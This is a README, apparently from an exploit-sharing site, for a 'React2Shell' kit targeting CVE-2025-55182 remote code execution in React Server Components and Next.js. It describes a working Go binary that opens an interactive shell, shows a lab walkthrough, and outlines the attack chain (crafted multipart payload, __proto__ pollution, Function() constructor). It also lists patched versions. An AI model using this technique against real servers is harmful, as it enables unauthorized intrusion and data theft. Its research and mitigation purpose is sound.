Share
## https://sploitus.com/exploit?id=49D198A8-CB9E-5764-86F7-7D157A435A84
# CVE-2025-55182 (React2Shell) Exploit Kit
## ๐ฏ Complete Working Exploit Demonstration
This project provides a **fully functional** demonstration of CVE-2025-55182 (React2Shell) - a critical Remote Code Execution vulnerability in React Server Components and Next.js.
**Status:** โ
**WORKING** - Achieves actual command execution on vulnerable servers
## ๐ What's Included
### Working Exploit Binary
- **Language:** Go 1.25.5
- **Binary:** `CVE-2025-55182` (7.8MB compiled executable)
- **Capabilities:**
- Interactive RCE shell on vulnerable Next.js servers
- Built-in file operations (cat, vi, touch, echo, rm)
- Command execution with output parsing
- File reading, writing, and editing
### Vulnerable Test Server
- **Next.js:** 15.0.1 (deliberately vulnerable)
- **React:** 19.0.0 (deliberately vulnerable)
- **Server Actions:** Enabled
- **Port:** http://localhost:3001
## โจ Quick Start
### 1. Start the Vulnerable Server
```bash
cd exploited-server
npm run dev
# Server starts on http://localhost:3001
```
### 2. Run the Exploit
```bash
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# When prompted:
Target: localhost:3001
```
### 3. Execute Commands
**Basic Commands:**
```
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
```
**File Operations:**
```
subh@rce $ touch hello.txt
[+] Created: hello.txt
subh@rce $ vi hello.txt
[i] Enter new content (type 'EOF' on a line by itself to finish):
Hello World!
EOF
[+] File saved: hello.txt
subh@rce $ cat hello.txt
Hello World!
subh@rce $ echo "New content" > hello.txt
[+] File written
subh@rce $ rm hello.txt
[+] Removed: hello.txt
```
**System Info:**
```
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
```
**Exit:**
```
subh@rce $ exit
```
## ๐ CVE-2025-55182 Details
- **CVE ID:** CVE-2025-55182
- **Name:** React2Shell
- **CVSS Score:** 10.0 (Critical)
- **Type:** Unauthenticated Remote Code Execution
- **Attack Vector:** Network
- **Affected:** React 19.0.0-19.2.0, Next.js 15.x-16.x with Server Actions
## ๐ Educational Value
This project demonstrates:
โ
**Real Exploitation** - Actual working RCE on vulnerable systems
โ
**Security Research** - Understanding modern web framework vulnerabilities
โ
**Go Development** - Compiling and using security tools
โ
**Vulnerability Analysis** - CVE research and exploitation techniques
โ
**Responsible Disclosure** - Ethical security testing practices
## ๐๏ธ Project Structure
```
react-2-shell-demo/
โโโ CVE-2025-55182 # Compiled Go exploit binary
โโโ main.go # Go source code
โโโ exploited-server/ # Vulnerable Next.js app
โ โโโ app/
โ โ โโโ actions.ts # Server Actions (vulnerable)
โ โ โโโ page.tsx # Warning UI
โ โโโ package.json # Next 15.0.1, React 19.0.0
โโโ *.md # Documentation
```
## ๐ฏ How It Works
### The Vulnerability
CVE-2025-55182 exploits insecure deserialization in React Server Components:
1. **Attack Vector:** Malicious HTTP POST with crafted multipart payloads
2. **Exploitation:** Prototype pollution via `__proto__`
3. **Trigger:** Fake chunks that invoke `Function()` constructor
4. **Result:** Arbitrary code execution in Node.js context
### The Exploit Flow
```
1. Craft multipart payload with malicious chunks
2. Send to Next.js Server Actions endpoint
3. Trigger prototype pollution via __proto__:then
4. Invoke Function() constructor with command
5. Execute code and return output via redirect
6. Parse result from X-Action-Redirect header
```
## โ ๏ธ Security Warning
**CRITICAL NOTICES:**
- โ **Vulnerable server is INTENTIONAL** - Do not expose to internet
- โ **Use for authorized testing ONLY** - Illegal without permission
- โ **Educational purposes** - Security research and learning
- โ **Ethical use required** - Follow responsible disclosure
## ๐ Documentation
- [`README.md`](README.md) - This file
- [`GO_EXPLOIT_USAGE.md`](GO_EXPLOIT_USAGE.md) - Detailed exploit usage
- [`VULNERABLE_SERVER.md`](exploited-server/VULNERABLE_SERVER.md) - Server setup guide
- [`EXPLOITATION_GUIDE.md`](EXPLOITATION_GUIDE.md) - Technical deep dive
- [`USAGE.md`](USAGE.md) - Usage examples and commands
## ๐ง Requirements
- **Go:** 1.25+ (for compiling from source)
- **Node.js:** 18+ (for running vulnerable server)
- **npm:** Latest version
- **OS:** macOS, Linux, or Windows
## ๐ฏ Testing Workflow
1. โ
**Setup vulnerable server** (`npm run dev` in exploited-server)
2. โ
**Run exploit binary** (`./CVE-2025-55182`)
3. โ
**Enter target** (localhost:3001)
4. โ
**Get interactive shell** (subh@rce $)
5. โ
**Execute commands** (whoami, ls, cat, etc.)
6. โ
**Exit when done** (exit command)
## ๐ Key Achievements
This project successfully demonstrates:
- โ
**Working RCE exploit** against CVE-2025-55182
- โ
**Interactive command shell** on vulnerable servers
- โ
**Complete exploitation workflow** from setup to execution
- โ
**Educational security research** with real-world tools
- โ
**Responsible vulnerability testing** in controlled environment
## ๐ก๏ธ Mitigation
**For Production Systems:**
1. **Update immediately** to patched versions:
- Next.js: 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, 16.0.7+
- React: 19.0.1+, 19.1.2+, 19.2.1+
2. **Rotate secrets** if exposed before December 4, 2025
3. **Monitor logs** for suspicious Server Actions activity
4. **Audit applications** using Server Components
## ๐ Learn More
- [CVE-2025-55182 Official Record](https://vulners.com/cve/CVE-2025-55182)
- [Next.js Security Advisory](https://nextjs.org/blog/security-nextjs-server-components-rce)
- [Wiz Research: React2Shell](https://www.wiz.io/blog/react2shell-critical-rce-in-react-server-components)
## ๐จโ๐ป Author
**@subhdotsol** - For educational and security research purposes
## ๐ License
This code is for educational and authorized security testing only.
---
**Remember:** Always obtain proper authorization before testing. Use responsibly! ๐